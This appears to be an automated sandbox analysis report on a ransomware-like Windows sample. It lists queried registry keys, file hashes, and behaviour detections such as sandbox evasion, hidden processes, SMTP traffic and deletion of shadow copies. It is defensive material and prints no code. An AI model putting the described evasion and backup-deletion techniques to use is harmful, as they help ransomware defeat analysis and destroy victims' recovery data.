SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
RequireCertificateEKUs
DNSRecord
smtp.gmail.com
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
ServiceStackVersion
ServiceStackVersion
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE
Logging
Logging Directory
Logging Directory
Log File Max Size
Analyzed Sample #1664761
Malware Artifacts
1664761
Sample-ID: #1664761
Job-ID: #4952696
This sample was analyzed by VMRay Analyzer 3.2.2 on a Windows 10 Redstone 2 system
100
VTI Score based on VTI Database Version 3.6
Metadata of Sample File #1664761
Submission-ID: #5538319
4444458bf47925c82431843fd147aabbfbee71ca849fc711cb69b0cea01f4747exe
MD5
956090ecfd9dc1986e4ae0afd782c1d3
SHA1
230aa8c348dcfa88698d2aaaae694d623c19b76b
SHA256
4444458bf47925c82431843fd147aabbfbee71ca849fc711cb69b0cea01f4747
Opened_By
Metadata of Analysis for Job-ID #4952696
True
Timeout
True
1200.098
NQDPDE
win10_64_rs2
x86 64-bit
Windows 10 Redstone 2
10.0.15063.540 (f6f48955-5489-4b24-b4df-942361f0730d)
FD1HVy
NQDPDE
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
Hide Tracks
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "C:\Users\FD1HVy\Desktop\vinfk.exe" starts with hidden window.
Creates process with hidden window
Obfuscation
VTI rule match with VTI rule score 1/5
vmray_read_from_remote_process
"c:\users\fd1hvy\desktop\vinfk.exe" reads from "C:\Users\FD1HVy\Desktop\vinfk.exe".
Reads from memory of another process
Obfuscation
VTI rule match with VTI rule score 1/5
vmray_allocate_wx_page
Allocates a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.
Creates a page with write and execute permissions
Obfuscation
VTI rule match with VTI rule score 2/5
vmray_dynamic_api_usage_by_api
Resolves an unusually high number of APIs.
Resolves APIs dynamically to possibly evade static detection
Anti Analysis
VTI rule match with VTI rule score 2/5
vmray_detect_forensic_tool_by_module
Tries to detect forensic tools by checking if the DLL "SunBelt Sandbox" exists.
Tries to detect a forensic tool
Anti Analysis
VTI rule match with VTI rule score 3/5
vmray_detect_application_sandbox_by_dll
Tries to detect "SunBelt Sandbox" by checking for existence of module "api_log.dll".
Tries to detect application sandbox
Discovery
VTI rule match with VTI rule score 0/5
vmray_enumerate_processes
Enumerates running processes.
Enumerates running processes
Hide Tracks
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "C:\WINDOWS\system32\cmd.exe" starts with hidden window.
Creates process with hidden window
Hide Tracks
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "C:\WINDOWS\system32\reg.exe" starts with hidden window.
Creates process with hidden window
Network Connection
VTI rule match with VTI rule score 1/5
vmray_request_dns_by_name
Resolves host name "smtp.gmail.com".
Performs DNS request
Discovery
VTI rule match with VTI rule score 2/5
vmray_read_net_adapter_addresses_by_api
Reads the network adapters' addresses by API.
Reads network adapter information
Hide Tracks
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "C:\WINDOWS\system32\forfiles.exe" starts with hidden window.
Creates process with hidden window
System Modification
VTI rule match with VTI rule score 2/5
vmray_set_desktop_wallpaper_by_api
Sets the desktop wallpaper to the file "c:\users\fd1hvy\appdata\local\temp\meme.jpg".
Changes the desktop wallpaper.
Anti Analysis
VTI rule match with VTI rule score 2/5
vmray_detect_generic_vm_by_rdtsc
Possibly trying to detect VM via rdtsc.
Tries to detect virtual machine
Anti Analysis
VTI rule match with VTI rule score 2/5
vmray_create_many_processes
Above average number of processes were monitored.
Creates an unusually large number of processes
System Modification
VTI rule match with VTI rule score 1/5
vmray_create_many_files
Creates above average number of files.
Creates an unusually large number of files
User Data Modification
VTI rule match with VTI rule score 4/5
vmray_modify_windows_backup_settings
Deletes Windows volume shadow copies.
Modifies Windows automatic backups
Antivirus
VTI rule match with VTI rule score 5/5
vmray_av_malicious_match
Local AV detected the sample itself as "Trojan.GenericKD.43826496".
Malicious content was detected by heuristic scan
Antivirus
VTI rule match with VTI rule score 5/5
vmray_av_malicious_match
Local AV detected a memory dump of process "vinfk.exe" as "Gen:Heur.Ransom.Imps.1".
Malicious content was detected by heuristic scan
Injection
VTI rule match with VTI rule score 2/5
vmray_modify_memory
"c:\users\fd1hvy\desktop\vinfk.exe" modifies memory of "c:\users\fd1hvy\desktop\vinfk.exe".
Writes into the memory of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 2/5
vmray_modify_control_flow_non_system
"c:\users\fd1hvy\desktop\vinfk.exe" alters context of "c:\users\fd1hvy\desktop\vinfk.exe".
Modifies control flow of a process running from a created or modified executable
Network Connection
VTI rule match with VTI rule score 1/5
vmray_tcp_out_connection
Outgoing TCP connection to host "74.125.205.109:587".
Connects to remote host
Network Connection
VTI rule match with VTI rule score 1/5
vmray_connect_on_uncommon_port
Tries to connect to TCP port 587 at 74.125.205.109.
Tries to connect using an uncommon port
Reputation
VTI rule match with VTI rule score 5/5
vmray_known_malicious_file
Reputation data labels the sample itself as "Mal/Generic-S".
Known malicious file
Static Analysis Remark
VTI rule match with VTI rule score 1/5
vmray_static_analysis_parser_error
Static engine was unable to completely parse the analyzed file: C:\Users\FD1HVy\Desktop\vinfk.exe.
Unparsable sections in file